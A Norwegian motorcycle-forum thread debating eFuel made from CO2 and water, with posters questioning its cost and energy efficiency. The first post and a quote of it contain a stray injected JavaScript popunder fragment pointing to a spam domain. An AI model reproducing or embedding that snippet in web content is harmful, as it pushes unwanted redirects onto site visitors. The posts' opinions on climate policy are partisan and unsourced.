eFuel - flopp eller framtid? "bensin" laget av luft/CO2 og vann

... prat om alt og ingenting, trenger ikke handle om MC.
Svar
Brukeravatar
AJ
Administrator
Innlegg: 37883
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

eFuel - flopp eller framtid? "bensin" laget av luft/CO2 og vann

Legg inn av AJ »

Kom over denne noe lettere hysteriske videoen i dag. Typisk amerikansk, selvfølgelig...
Men! kan dette ha noe for seg?
De jobber med dette i Chile og drivstoffet funker åpenbart.
Men til en skyhøy pris, som naturligvis må betydelig ned før eFuel kan bli allemannsgode.
Og produksjonskapasiteten må selvfølgelig også økes betydelig.

Her i Norge planlegges CO2 fangst og lagring. Altså at CO2'en anses som noe vi bare må bli kvitt.
Mens i Chile bruker de CO2 som som en av "ingrediensene" sammen med vann i produksjonen av eFuel.
Begge deler har vi åpenbart mer enn nok av her i landet også.

Så hvorfor er det ingen som jobber med dette i Norge når det gjør det i et land som Chile?

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

mekkern
Innlegg: 7591
Registrert: 06 nov 2008, 22:42
Motorsykkelen din: flere -til div kjøring.
Sted: Tranby

Re: eFuel - flopp eller framtid? "bensin" laget av luft og vann

Legg inn av mekkern »

AJ skrev: 11 des 2023, 17:23 Kom over denne noe lettere hysteriske videoen i dag. Typisk amerikansk, selvfølgelig...
Men! kan dette ha noe for seg?
De jobber med dette i Chile og drivstoffet funker åpenbart.
Men til en skyhøy pris, som naturligvis må betydelig ned før eFuel kan bli allemannsgode.
Og produksjonskapasiteten må selvfølgelig også økes betydelig.

Her i Norge planlegges CO2 fangst og lagring. Altså at CO2'en anses som noe vi bare må bli kvitt.
Mens i Chile bruker de CO2 som som en av "ingrediensene" sammen med vann i produksjonen av eFuel.
Begge deler har vi åpenbart mer enn nok av her i landet også.

Så hvorfor er det ingen som jobber med dette i Norge når det gjør det i et land som Chile?

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Dette er litt sånn EU miljøpolitikk....
Porsche leverer forøvrig nye biler med Efuel på tanken.
Men greia er at dette fungerer fint når man i perioder har oveskuddsenergi å lage dette av-men ikke like energieffektivt som direkte drift med elektro.
Det er mest effektivt når man kobler en bedrifts utslipp direkte til prosessen -men da er ikke drivstoffet "grønt" da det er linket til fossile co2utslipp.
Men hvis en bygger denne produksjonsenheten ved siden av utslippet slik at man tar dette bare fra atmosfæren -DA er dette klimanøytralt.
Men tenk så jævlig a gitt-klimanøytrale forbrenningsmotoerer(vi kunne fortsatt å bruke bilene og lastebiler maskiner til de er oppbrukte) hvordan skal en da selge batterielektrisk kjøretøy?
Litt på samme måte at vi i norge ikke regner skogen med i klimaregnskapet da det hadde blitt for lett å oppnå målene vi har lovet i avtalene (hviket er mål vi selv har bestemt).

Hele greiene med klimamål og grønne skifter er kun for at man skal generere penger- Hvis ikke hadde vi jo gjort ting som monnet og ikke symbolpolitikk.

Har forøvrig vært å tittet på dette anlegget:
https://www.silvagreenfuel.no/
Skal jeg være helt ærlig så ser jeg dette som en flopp i forhold til ressurser pengebruk og energiforbruk fra skog til drivhjul/propell.
当有疑问时踢你的敌人在生殖器上,你可以道歉后

Online
Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: eFuel - flopp eller framtid? "bensin" laget av luft og vann

Legg inn av SveinHa »

Det var vel lignende produksjonspris Hitler opplevde da han konverterte kull til diesel i Polen under WW2 så produksjonen stanset vel samtidig med krigen...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Brukeravatar
rolf-arne
Innlegg: 2137
Registrert: 20 aug 2018, 20:28
Motorsykkelen din: Pan European 1100 -1995, CBX 1000
Sted: Nordvågen,Nordkapp
Kontakt:

Re: eFuel - flopp eller framtid? "bensin" laget av luft/CO2 og vann

Legg inn av rolf-arne »

Så er det det der med effekt- hva skal til for å produsere de forskjellige drivstoff.
I følge nedenfor viste tabell fra Rambøll , så ser vi hva som skal til av el-kraft og hva vi får ut av den i effektiv kjøredistanse.

Selvfølgelig så er det mange avrundinger her som gjør denne modellen til en ganske unøyaktig sammenligning- men fullt brukbar i sammenligningens hensikt.

Det dem produserer i Chile gir altså mindre enn 20% igjen for den energien som putes inn.

Da blir mitt spørsmål , i en verden som er i underskudd av energi, har vi råd til dette?

Det blir jo som å produsere sprit av tre for så å brenne dette til oppvarming - i stedet for å brenne veden direkte

Må vi ta omveien???
syntetisk drivstoff2.jpg
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.
Nyskjærrig - lurer på hva som er bak neste sving - når det er fastslått - så blir man rastlaus og lurer på hva som er bak den neste -- å sånn går livet - av og til tar nyskjærrigheta pause og da kan man avspore ei stund - til å bli kjent med folk og gjøre betjentskaper om til vennskap -- og ikke minst kan kroppen ha sine gode stunder og da gjelder det å enten nyte livet eller få noe gjort. Det siste skyves det ofte på, skal man være ærlig..

Online
Brukeravatar
SveinHa
Innlegg: 374
Registrert: 09 mai 2023, 23:46
Motorsykkelen din: BMW R1100RS 1993
Sted: Carten Island
Kontakt:

Re: eFuel - flopp eller framtid? "bensin" laget av luft/CO2 og vann

Legg inn av SveinHa »

rolf-arne skrev: 12 des 2023, 08:04Da blir mitt spørsmål , i en verden som er i underskudd av energi, har vi råd til dette?

Det blir jo som å produsere sprit av tre for så å brenne dette til oppvarming - i stedet for å brenne veden direkte

Må vi ta omveien???
Godt spørsmål. Vi har underskudd av el.kraft men rikelig med fossil energi enn så lenge...

Så en videosnutt fra Senatet i USA (eller muligens en lignende setting) der et spørsmål kom opp: "Om vi når målet med 50% el.biler, har vi da nok el.kraft tilgjengelig?". Svaret var helt krystallklart: "Absolutt ikke i det hele tatt...".

Samme situasjon her på berget. Bedrifter som ønsker å kutte fossil energi og erstatte med el.kraft får ikke lov for der er ikke el.kraft tilgjengelig. Der var jo også nylig en sak i trøndelagen der et transportfirma handlet inn politisk korrekte el.lastebiler men måtte vente i 10 år på å få montert ladestasjon...
Litt om meg og mitt (der er fremdeles noen som er så gamle at de har hjemmeside i stedet for alskens usosiale medier): http://www.sveinha.com/

Mine kjøretøy pr i dag: "NittiNitti": -90 Land Rover 90, "Bimbo": -93 BMW R1100RS, "Helmut": -08 Knaus Sunliner 808

Svar